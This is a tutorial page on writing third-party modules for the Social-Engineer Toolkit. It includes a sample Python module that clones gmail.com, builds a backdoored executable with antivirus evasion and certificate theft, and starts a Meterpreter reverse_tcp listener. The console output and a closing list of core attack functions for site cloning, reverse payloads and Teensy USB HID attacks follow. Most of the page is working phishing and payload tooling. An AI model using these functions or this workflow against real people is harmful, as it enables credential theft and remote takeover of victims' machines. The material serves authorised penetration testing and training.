SET Module Development
From Metasploit Unleashed
Version 1.2 introduced the core library modules and the ability to add third-party modules to SET. The “modules” folder in the SET root directory holds additions, enhancements, and other contributions to the toolkit. The first thing to note is that when you add a new “.py” file to the modules directory, it is automatically imported into SET under “Third Party Modules”. Below is an example of a test module:
#
# These are required fields
#
import sys
# switch over to import core
sys.path.append("src/core")
# import the core modules
try: reload(core)
except: import core
MAIN="This is a test module"
AUTHOR="Dave 'ReL1K' davek@social-engineer.org"
# def main(): header is required
def main():
    core.java_applet_attack("https://gmail.com","443","reports/")
    pause=raw_input("This module has finished completing. Press <enter> to continue")
In this example, we create a simple module that uses the Java applet attack vector to clone a website and launch the attack for us, including creating the Metasploit payloads. Ultimately, you can build whatever you want using the function calls built into SET or by writing your own. Now if we run SET:
root@bt:/pentest/exploits/set# ./set

  ..######..########.########
  .##....##.##..........##...
  .##.......##..........##...
  ..######..######......##...
  .......##.##..........##...
  .##....##.##..........##...
  ..######..########....##...

Welcome to the Social-Engineer Toolkit (SET). Your one stop shop for all of your social-engineering needs..

DerbyCon 2011 Sep30-Oct02 - http://www.derbycon.com

Select from the menu:

1. Spear-Phishing Attack Vectors
2. Website Attack Vectors
3. Infectious Media Generator
4. Create a Payload and Listener
5. Mass Mailer Attack
6. Teensy USB HID Attack Vector
7. SMS Spoofing Attack Vector
8. Third Party Modules
9. Update the Metasploit Framework
10. Update the Social-Engineer Toolkit
11. Help, Credits, and About
12. Exit the Social-Engineer Toolkit

Enter your choice: 8

Welcome to the Social-Engineer Toolkit Third Party Modules menu.

Please read the readme/modules.txt for more information on how to create your own modules.

1. This is a test module
2. Return to the previous menu.

Enter the module you want to use: 1

[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...
[-] Backdoor completed successfully. Payload is now hidden within a legit executable.
[*] UPX Encoding is set to ON, attempting to pack the executable with UPX encoding.
[*] Digital Signature Stealing is ON, hijacking a legit digital certificate.
[*] Executable created under src/program_junk/ajk1K7Wl.exe
[*] Cloning the website: https://gmail.com
[*] This could take a little bit...
[*] Injecting Java Applet attack into the newly cloned website.
[*] Filename obfuscation complete. Payload name is: m3LrpBcbjm13u
[*] Malicious java applet website prepped for deployment

Site has been successfully cloned and is: reports/
[*] Starting the multi/handler through Metasploit...

                 o                       8         o   o
                 8                       8             8
ooYoYo. .oPYo.  o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8  o8P
8' 8  8 8oooo8   8  .oooo8 Yb..   8    8 8 8    8  8   8
8  8  8 8.       8  8    8   'Yb. 8    8 8 8    8  8   8
8  8  8 `Yooo'   8  `YooP8 `YooP' 8YooP' 8 `YooP'  8   8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

       =[ metasploit v3.6.0-dev [core:3.6 api:1.0]
+ -- --=[ 644 exploits - 328 auxiliary
+ -- --=[ 216 payloads - 27 encoders - 8 nops
       =[ svn r11638 updated today (2011.01.25)

resource (/pentest/exploits/set/src/program_junk/msf_answerfile)> use multi/handler
resource (/pentest/exploits/set/src/program_junk/msf_answerfile)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (/pentest/exploits/set/src/program_junk/msf_answerfile)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (/pentest/exploits/set/src/program_junk/msf_answerfile)> set LPORT 443
LPORT => 443
resource (/pentest/exploits/set/src/program_junk/msf_answerfile)> exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 0.0.0.0:443
[*] Starting the payload handler...
msf exploit(handler) >
msf exploit(handler) >
msf exploit(handler) > exit

This module has finished completing. Press <enter> to continue
- core.meta_path() # Returns the path of the Metasploit directory in the set_config
- core.grab_ipaddress() # Returns your IP address used for the attacks
- core.check_pexpect() # Checks to see if the Python module PEXPECT is installed
- core.check_beautifulsoup() # Checks to see if the Python module BeautifulSoup is installed
- core.cleanup_routine() # Removes stale process information, files, etc.
- core.update_metasploit() # Updates the Metasploit framework
- core.update_set() # Updates the Social-Engineer Toolkit
- core.help_menu() # Displays the help menu
- core.date_time() # Displays the date and time
- core.generate_random_string(low,high) # Generates a random string whose length falls between the low and high values. For example, generate_random_string(1,30) creates a unique string between 1 and 30 characters long.
- core.site_cloner(website,exportpath, *args) # Clones a website and exports it to a specific path. For example, core.site_cloner("https://gmail.com","reports/") clones the website and exports it to the reports directory.
- core.meterpreter_reverse_tcp_exe(port) # creates a meterpreter reverse payload, only need to specify port.
- core.metasploit_listener_start(payload,port) # creates a meterpreter listener, only need to specify payload (example windows/meterpreter/reverse_tcp) and port.
- core.start_web_server(directory) # Starts a web server in the directory root you specify, for example core.start_web_server("reports")
- core.java_applet_attack(website,port,directory) # Clones a website, creates meterpreter backdoor, starts a webserver and creates the listener. The port is the meterpreter reverse listener port. Example: core.java_applet_attack("https://gmail.com","443","reports/")
- core.teensy_pde_generator(attack_method) # Creates a Teensy PDE file you can use for the Teensy USB HID attack vector. You can call the following attack methods: beef, powershell_down, powershell_reverse, java_applet, and wscript. Example: teensy_pde_generator("powershell_reverse")
